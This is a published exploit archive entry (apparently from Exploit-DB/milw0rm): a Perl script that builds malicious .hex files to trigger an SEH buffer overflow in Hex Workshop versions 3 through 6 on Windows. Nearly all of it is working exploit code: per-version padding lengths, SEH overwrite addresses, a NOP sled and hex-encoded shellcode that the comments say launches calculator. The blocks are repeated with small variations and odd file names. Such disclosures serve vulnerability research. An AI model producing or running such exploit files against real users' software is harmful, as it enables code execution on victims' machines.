Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)

EDB-ID:

9550

Author:

hack4love

Type:

local

Platform:

Windows

Published:

2009-08-31

#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)
# Found By: DATA_SNIPER
# http://www.bpsoft.com/downloads/
######################################################################################
##info:: i write 3 exploits for the 3 v
######################################################################################
# USE>>file>>import>>hack4love.hex>> boom calc
######################################################################################
#
#Hex Workshop v 3.11
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 172;
my $nsh="EB069090";
my $seh="62380012";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################
open(myfile,'>> HACK4LOVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
######################################################################################
######################################################################################
######################################################################################
######################################################################################
#
#Hex Workshop V 4.00 // v 4.20
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 172;
my $nsh="EB069090";
my $seh="62380012";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;

######################################################################################
open(myfile,'>> HACK4LOVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
######################################################################################
######################################################################################
######################################################################################
#
#Hex Workshop V 4.21 // 4.22 // 4.23
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 176;
my $nsh="EB069090";
my $seh="8c29d374";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;

######################################################################################
open(myfile,'>> HACK4LOVwwE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
######################################################################################
######################################################################################
######################################################################################
######################################################################################
#
#Hex Workshop v 5
#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 172;
my $nsh="EB069090";
my $seh="38f8d374";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################
open(myfile,'>> HACK4LOsssVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################
#######################################################################################
#######################################################################################
#######################################################################################
#
#Hex Workshop v6.0.0.4582 //v6.0.1.4603
#
#######################################################################################
#######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 2228;
my $nsh="EB069090";
my $seh="38f8d374";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;

#########################################################################################
open(myfile,'>> HACK4LOVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################

# milw0rm.com [2009-08-31]